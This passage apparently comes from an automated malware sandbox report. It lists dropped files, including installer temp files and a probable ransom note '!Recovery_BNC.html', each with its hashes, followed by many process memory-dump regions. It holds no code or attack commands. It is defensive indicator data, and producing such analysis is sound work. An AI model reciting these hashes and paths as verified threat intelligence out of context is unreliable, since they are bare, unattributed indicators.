                                                                                                                    d5216a53df9cfbe1a78629c103286eb17042f639149c46b6a1cd76498531ae82afd265462fbe0ba9baaff275fc95c66504804f107c449f3fc5833b1ed9c3da46

                                                                                                                  • C:\Windows\Installer\MSI75D4.tmp

                                                                                                                    Filesize

                                                                                                                    257KB

                                                                                                                    MD5

                                                                                                                    d1f5ce6b23351677e54a245f46a9f8d2

                                                                                                                    SHA1

                                                                                                                    0d5c6749401248284767f16df92b726e727718ca

                                                                                                                    SHA256

                                                                                                                    57cb8f01cf553c3886760180d1a74839f2f676640115504485aca9692f577acc

                                                                                                                    SHA512

                                                                                                                    960e90894e7bedcc89894e77e57e8ee0c99dd2c530d02665e8bbd3a1793eccc1e295c5923d1f37c757fa1158097fbaae70898c16052882d3d210c29ea801b3ba

                                                                                                                  • C:\Windows\Installer\MSI8FE6.tmp

                                                                                                                    Filesize

                                                                                                                    363KB

                                                                                                                    MD5

                                                                                                                    4a843a97ae51c310b573a02ffd2a0e8e

                                                                                                                    SHA1

                                                                                                                    063fa914ccb07249123c0d5f4595935487635b20

                                                                                                                    SHA256

                                                                                                                    727ecf287fb6f4953ee7748913dd559b4f8d3a022fa2ca55bc51cf5886c52086

                                                                                                                    SHA512

                                                                                                                    905c081552d95b523ecf1155b6c7e157652e5ff00cda30c1c21124d266eb7d305c3398d6832316f403dc45d1b639f1a5a67aea29922cd1a032f52e5247ec55d2

                                                                                                                  • F:\!Recovery_BNC.html

                                                                                                                    Filesize

                                                                                                                    8KB

                                                                                                                    MD5

                                                                                                                    6e9db340082a1bccb3b4e88111af9b97

                                                                                                                    SHA1

                                                                                                                    81d033d8b03c1dfda1d84198fd85951742fb0352

                                                                                                                    SHA256

                                                                                                                    f9cad2cbdf748065669a4c395c37406f24486240164325ab2e9cc06445df9b5f

                                                                                                                    SHA512

                                                                                                                    df5f1d178278d463ef66ffe964f7a88a26e202a8baf595fb3a0358d363ef0e8693e6136999c3f0fc062741873340e24a738936883de955f28b4c3d9e34f85182

                                                                                                                  • memory/316-473-0x0000000000400000-0x0000000000445000-memory.dmp

                                                                                                                    Filesize

                                                                                                                    276KB

                                                                                                                  • memory/316-269-0x0000000000400000-0x0000000000445000-memory.dmp

                                                                                                                    Filesize

                                                                                                                    276KB

                                                                                                                  • memory/316-115-0x0000000000400000-0x0000000000445000-memory.dmp

                                                                                                                    Filesize

                                                                                                                    276KB

                                                                                                                  • memory/316-283-0x0000000000400000-0x0000000000445000-memory.dmp

                                                                                                                    Filesize

                                                                                                                    276KB

                                                                                                                  • memory/316-268-0x0000000000400000-0x0000000000445000-memory.dmp

                                                                                                                    Filesize

                                                                                                                    276KB

                                                                                                                  • memory/320-224-0x0000000000400000-0x000000000044D000-memory.dmp

                                                                                                                    Filesize

                                                                                                                    308KB

                                                                                                                  • memory/320-287-0x0000000000400000-0x000000000044D000-memory.dmp

                                                                                                                    Filesize

                                                                                                                    308KB

                                                                                                                  • memory/836-198-0x0000000000400000-0x0000000000426000-memory.dmp

                                                                                                                    Filesize

                                                                                                                    152KB

                                                                                                                  • memory/836-191-0x0000000000400000-0x0000000000426000-memory.dmp

                                                                                                                    Filesize

                                                                                                                    152KB

                                                                                                                  • memory/912-223-0x0000000000400000-0x0000000000410000-memory.dmp

                                                                                                                    Filesize

                                                                                                                    64KB

                                                                                                                  • memory/912-222-0x0000000000400000-0x0000000000410000-memory.dmp

                                                                                                                    Filesize

                                                                                                                    64KB

                                                                                                                  • memory/912-322-0x0000000000400000-0x0000000000410000-memory.dmp

                                                                                                                    Filesize

                                                                                                                    64KB

                                                                                                                  • memory/1376-267-0x0000000000A90000-0x0000000000ACF000-memory.dmp

                                                                                                                    Filesize

                                                                                                                    252KB

                                                                                                                  • memory/1432-290-0x00000000002A0000-0x00000000002A1000-memory.dmp

                                                                                                                    Filesize

                                                                                                                    4KB

                                                                                                                  • memory/1432-285-0x0000000000400000-0x000000000041B000-memory.dmp

                                                                                                                    Filesize

                                                                                                                    108KB

                                                                                                                  • memory/1528-166-0x0000000002980000-0x0000000002A5B000-memory.dmp

                                                                                                                    Filesize

                                                                                                                    876KB

                                                                                                                  • memory/1528-163-0x00000000003C0000-0x00000000003CD000-memory.dmp

                                                                                                                    Filesize

                                                                                                                    52KB

                                                                                                                  • memory/1528-160-0x0000000010000000-0x000000001005B000-memory.dmp

                                                                                                                    Filesize

                                                                                                                    364KB

                                                                                                                  • memory/1528-169-0x000000001D1A0000-0x000000001D1B8000-memory.dmp

                                                                                                                    Filesize

                                                                                                                    96KB

                                                                                                                  • memory/1528-156-0x000000001E000000-0x000000001E25E000-memory.dmp

                                                                                                                    Filesize

                                                                                                                    2.4MB

                                                                                                                  • memory/1528-172-0x0000000000960000-0x0000000000965000-memory.dmp

                                                                                                                    Filesize

                                                                                                                    20KB

                                                                                                                  • memory/1528-175-0x0000000000970000-0x0000000000976000-memory.dmp

                                                                                                                    Filesize

                                                                                                                    24KB

                                                                                                                  • memory/1528-178-0x0000000000980000-0x000000000098A000-memory.dmp

                                                                                                                    Filesize

                                                                                                                    40KB

                                                                                                                  • memory/1532-190-0x00000000000A0000-0x00000000000D7000-memory.dmp

                                                                                                                    Filesize

                                                                                                                    220KB

                                                                                                                  • memory/1532-4982-0x00000000000A0000-0x00000000000D7000-memory.dmp

                                                                                                                    Filesize

                                                                                                                    220KB

                                                                                                                  • memory/1668-292-0x0000000000400000-0x0000000000449000-memory.dmp

                                                                                                                    Filesize

                                                                                                                    292KB

                                                                                                                  • memory/1668-293-0x0000000000400000-0x0000000000449000-memory.dmp

                                                                                                                    Filesize

                                                                                                                    292KB

                                                                                                                  • memory/1936-232-0x0000000000400000-0x000000000043E000-memory.dmp

                                                                                                                    Filesize

                                                                                                                    248KB

                                                                                                                  • memory/1936-233-0x0000000000400000-0x000000000043E000-memory.dmp

                                                                                                                    Filesize

                                                                                                                    248KB

                                                                                                                  • memory/1936-281-0x0000000000400000-0x000000000043E000-memory.dmp

                                                                                                                    Filesize

                                                                                                                    248KB

                                                                                                                  • memory/2076-188-0x0000000140000000-0x00000001405E8000-memory.dmp

                                                                                                                    Filesize

                                                                                                                    5.9MB

                                                                                                                  • memory/2076-97-0x0000000140000000-0x00000001405E8000-memory.dmp

                                                                                                                    Filesize

                                                                                                                    5.9MB

                                                                                                                  • memory/2076-96-0x0000000140000000-0x00000001405E8000-memory.dmp

                                                                                                                    Filesize

                                                                                                                    5.9MB

                                                                                                                  • memory/2144-299-0x0000000000400000-0x00000000005DF000-memory.dmp

                                                                                                                    Filesize

                                                                                                                    1.9MB

                                                                                                                  • memory/2156-284-0x0000000000400000-0x0000000000442000-memory.dmp

                                                                                                                    Filesize

                                                                                                                    264KB

                                                                                                                  • memory/2340-227-0x0000000000400000-0x0000000000412000-memory.dmp

                                                                                                                    Filesize

                                                                                                                    72KB

                                                                                                                  • memory/2340-226-0x0000000000400000-0x0000000000412000-memory.dmp

                                                                                                                    Filesize

                                                                                                                    72KB

                                                                                                                  • memory/2340-286-0x0000000000400000-0x0000000000412000-memory.dmp

                                                                                                                    Filesize

                                                                                                                    72KB

                                                                                                                  • memory/2572-307-0x0000000000080000-0x0000000000088000-memory.dmp

                                                                                                                    Filesize

                                                                                                                    32KB

                                                                                                                  • memory/2700-340-0x0000000000DA0000-0x0000000000DC2000-memory.dmp

                                                                                                                    Filesize

                                                                                                                    136KB

                                                                                                                  • memory/2864-303-0x0000000000400000-0x000000000042D000-memory.dmp

                                                                                                                    Filesize

                                                                                                                    180KB

                                                                                                                  • memory/2864-331-0x0000000000400000-0x000000000042D000-memory.dmp

                                                                                                                    Filesize

                                                                                                                    180KB

                                                                                                                  • memory/2864-304-0x0000000000400000-0x000000000042D000-memory.dmp

                                                                                                                    Filesize

                                                                                                                    180KB

                                                                                                                  • memory/2864-301-0x0000000000400000-0x000000000042D000-memory.dmp

                                                                                                                    Filesize

                                                                                                                    180KB

                                                                                                                  • memory/2880-230-0x0000000000400000-0x0000000000423000-memory.dmp

                                                                                                                    Filesize

                                                                                                                    140KB

                                                                                                                  • memory/2888-221-0x0000000000400000-0x000000000043A000-memory.dmp

                                                                                                                    Filesize

                                                                                                                    232KB

                                                                                                                  • memory/2888-219-0x0000000000400000-0x000000000043A000-memory.dmp

                                                                                                                    Filesize

                                                                                                                    232KB

                                                                                                                  • memory/2888-220-0x0000000000C50000-0x0000000000C84000-memory.dmp

                                                                                                                    Filesize

                                                                                                                    208KB

                                                                                                                  • memory/2928-282-0x0000000000400000-0x0000000000470000-memory.dmp

                                                                                                                    Filesize

                                                                                                                    448KB

                                                                                                                  • memory/2936-231-0x0000000000400000-0x0000000000423000-memory.dmp

                                                                                                                    Filesize

                                                                                                                    140KB

                                                                                                                  • memory/3068-189-0x0000000000C50000-0x0000000000C84000-memory.dmp

                                                                                                                    Filesize

                                                                                                                    208KB

                                                                                                                  • memory/3068-229-0x0000000000C50000-0x0000000000C84000-memory.dmp

                                                                                                                    Filesize

                                                                                                                    208KB

                                                                                                                  • memory/6516-59827-0x0000000140000000-0x00000001405E8000-memory.dmp

                                                                                                                    Filesize

                                                                                                                    5.9MB

                                                                                                                  • memory/6516-59826-0x0000000140000000-0x00000001405E8000-memory.dmp

                                                                                                                    Filesize

                                                                                                                    5.9MB

                                                                                                                  • memory/6516-61493-0x0000000140000000-0x00000001405E8000-memory.dmp

                                                                                                                    Filesize

                                                                                                                    5.9MB